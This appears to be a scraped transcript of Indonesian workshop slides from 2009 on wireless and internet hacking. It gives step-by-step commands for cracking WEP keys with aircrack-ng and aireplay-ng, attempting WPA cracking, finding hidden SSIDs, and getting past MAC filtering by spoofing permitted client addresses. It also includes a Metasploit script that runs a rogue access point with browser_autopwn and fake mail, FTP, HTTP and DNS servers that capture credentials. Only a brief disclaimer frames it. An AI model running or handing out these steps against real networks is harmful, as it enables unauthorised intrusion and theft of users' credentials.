Wireless Hacking, Web Hacking & Security System Oleh : Nathan Gusti Ryan We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience IT Training – Software – Hardware – Technical Support – Networking – Server System Website : www.xp-solution.com Email : [email protected]
29
Embed
Wireless Hacking, Web Hacking, Dan Security System
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Wireless Hacking, Web Hacking
&
Security System
Oleh :
Nathan Gusti Ryan
We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience
IT Training – Software – Hardware – Technical Support – Networking – Server System
--bssid 00:11:22:33:44:55 => Mac Address dari AP yang ditampilkan
-w hasilcap => file output dari hasil scanning
ath0 => virtual wifi interface
--ivs => format penyimpanan hasil capture sebagai file ivs
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 #aircrack-ng hasilcap.cap
Fungsinya => untuk menganalisa hasil capture packet dari airdump.
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 Kita juga bisa melakukan monitoring jaringan wireless ini mengunakan Kismet
Selanjutnya kita akan melihat Client yang terkoneksi ke Access Point ini :
Tekan space
S - untuk men-sort
S - untuk men-sort terhadap SSID
Tekan Panah Bawah - Letakan di SSID AP yang kita inginkan.
ENTER - detail AP
C - lihat siapa saja client AP tersebut
Selanjutnya akan terlihat daftar Client seperti dibawah ini :
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 AIREPLAY
bt ~ # aireplay-ng Aireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe Original work: Christophe Devine http://www.aircrack-ng.org usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -w iswep : frame control, WEP bit -D : disable AP detection Replay options: -x nbpps : number of packets per second -p fctrl : set frame control word (hex) -a bssid : set Access Point MAC address -c dmac : set Destination MAC address -h smac : set Source MAC address -g value : change ring buffer size (default: 8) -F : choose first matching packet Fakeauth attack options: -e essid : set target AP SSID -o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives -y prga : keystream for shared key auth Arp Replay attack options: -j : inject FromDS packets Fragmentation attack options: -k IP : set destination IP in fragments -l IP : set source IP in fragments Test attack options: -B : activates the bitrate test source options: -i iface : capture packets from this interface -r file : extract packets from this pcap file attack modes (Numbers can still be used): --deauth count : deauthenticate 1 or all stations (-0)
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 --fakeauth delay : fake authentication with AP (-1) --interactive : interactive frame selection (-2) --arpreplay : standard ARP-request replay (-3) --chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5) --caffe-latte : query a client for new IVs (-6) --cfrag : fragments against a client (-7) --test : tests injection and quality (-9) --help : Displays this usage screen ############
Current MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)
bt ~ # macchanger -m 00:21:63:ad:7c:3a wifi0
Current MAC: 00:21:63:ad:7c:3b (unknown)
Faked MAC: 00:21:63:ad:7c:3a (unknown)
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Menyambung ke HotSpot Untuk menyambungkan diri ke HotSpot menggunakan text mode. Langkah yang biasa digunakan
1. Scanning frekuensi
# iwlist scanning
2. Set ESSID interface wireless (misalnya eth1) agar sama dengan HotSpot
# iwconfig eth1 essid HotSpotSSID
3. Cek apakah sudah tersambung
# iwconfig eth1
4. Minta IP address ke DHCP Server
# dhclient eth1
Beberapa Cara untuk Cek Sambungan
1. Cek apakah routing ke Internet sudah di berikan oleh DHCP Server. Perhatikan IP gateway untuk tujuan 0.0.0.0 apakah sudah di berikan, menggunakan perintah,
# netstat -nr
2. Ping ke gateway HotSpot
# ping <ip-gateway>
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Scanning HotSpot Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.
iwlist
Cara yang paling sederhana adalah menggunakan perintah
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Menjebol WEP Menggunakan Airodump dan Aircrack Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan susah untuk di crack WEP-nya.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.
Jalankan aircrack untuk mengcrack WEP
# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs
misalnya
# aircrack-ng -a 1 -e linksys -n 64 hasilcapture-01.ivs # aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs
Bisa juga menggunakan perintah
# aircrack-ng -a 1 -n 64 hasilcapture-01.ivs
Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEP
Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan HotSpot.
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Menjebol WEP Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya biasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika ada bug di Access Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut
Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan adalah
# aireplay-ng -5 -b $AP -h $WIFI eth1
Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapat dilakukan menggunakan
# aircrack-ng -a 1 -n 64 hasilcapture.ivs
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Menjebol WPA Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Menemukan Hidden SSID Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet
# kismet
Hidden SSID akan berwarna biru dan di tutup oleh tanda <> seperti tampak pada gambar.
tampilan kismet, warna biru adalah Hidden SSID
Bagi anda yang cukup beruntung dapat juga menggunakan cara di bawah ini. Tapi kemungkinan gagal lumayan tinggi.
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 load db_sqlite3 db_create /root/evilwireless.db use auxiliary/server/browser_autopwn setg AUTOPWN_HOST 10.0.0.1 setg AUTOPWN_PORT 55550 setg AUTOPWN_URI /ads set LHOST 10.0.0.1 set LPORT 45000 set SRVPORT 55550 set URIPATH /ads run use auxiliary/server/capture/pop3 set SRVPORT 110 set SSL false run use auxiliary/server/capture/pop3 set SRVPORT 995 set SSL true run use auxiliary/server/capture/ftp run use auxiliary/server/capture/imap set SSL false set SRVPORT 143 run use auxiliary/server/capture/imap set SSL true set SRVPORT 993 run use auxiliary/server/capture/smtp set SSL false set SRVPORT 25 run use auxiliary/server/capture/smtp set SSL true set SRVPORT 465 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 5353 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 53 run use auxiliary/server/capture/http set SRVPORT 80 set SSL false run use auxiliary/server/capture/http set SRVPORT 8080
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 set SSL false run use auxiliary/server/capture/http set SRVPORT 443 set SSL true run use auxiliary/server/capture/http set SRVPORT 8443 set SSL true run ./msfconsole -r evilwireless.rc
http://0x80.org/blog/?p=131 - The Evil Access Point http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.html -
How to create Face AP http://ww2.mastaputa.com:9999/?p=29 http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Melewati Pembatasan MAC Address Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang di ijinkan lewat oleh AP menggunakan Kismet adalah
# kismet
Lakukan
space S - untuk men-sort S - untuk men-sort terhadap SSID Panah Bawah - Letakan di SSID AP yang kita inginkan. ENTER - detail AP C - lihat siapa saja client AP tersebut
Pastikan airmon tidak aktif di WLAN eth1
# airmon-ng stop eth1
Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client yang diijinkan AP
# ifconfig eth1 down # ifconfig eth1 hw ether 00:16:CF:C1:FA:F5 # ifconfig eth1 up
Alternatif lain
# ifconfig eth1 down # macchanger -mac 00:16:CF:C1:FA:F5 eth1 # ifconfig eth1 up
atau untuk random MAC address
# macchanger -r eth1
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Aplikasi Yang Perlu Disiapkan Beberapa paket software yang dibutuhkan : # apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev libnet1 libnet1-dev libdnet \ libdnet-dev subversion python2.4 python2.4-dev python-pyx python-crypto python-psyco dhcp3-server bind9 apache2
Install beberapa aplikasi yang lebih fokus untuk hacking wireless # apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng
Pada Ubuntu 9.04 aplikasi yang di instalasi adalah # apt-get install kismet python-scapy macchanger ettercap dsniff aircrack-ng
Download source code aplikasi berikut jika diperlukan # cd /usr/local/src # svn co https://802.11ninja.net/svn/lorcon/trunk lorcon # wget http://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gz # wget http://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgz # wget http://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgz
Bagi pengguna Atheros & RT73 perlu mendownload # wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-20070414.tar.gz # wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.6.1.tar.bz2 # wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-1.1.0.tar.bz2
Compile & Install Lorcon # cd /usr/local/src/lorcon/ # ./configure \ -prefix=/usr \ -sysconfdir=/etc/lorcon \ -localstatedir=/var \ -mandir=/usr/share/man\ -infodir=/usr/share/info # make # make install
Sebaiknya di lakukan melalui airpwn seperti di bawah ini, Compile & Install Airpwn # cd /usr/local/src/ # tar zxvf airpwn-1.3.tgz # cd /usr/local/src/airpwn-1.3 # tar zxvf lorcon-current.tgz # cp -Rf /usr/local/src/lorcon/* /usr/local/src/airpwn-1.3/lorcon # cd /usr/local/src/airpwn-1.3/lorcon # ./configure \ -prefix=/usr \ -sysconfdir=/etc/lorcon \ -localstatedir=/var \ -mandir=/usr/share/man\ -infodir=/usr/share/info # make # make install
Langkah selanjutnya kita perlu menginstall source code kernel:( ... # cd /usr/local/src/airpwn-1.3 # ./configure # make # make install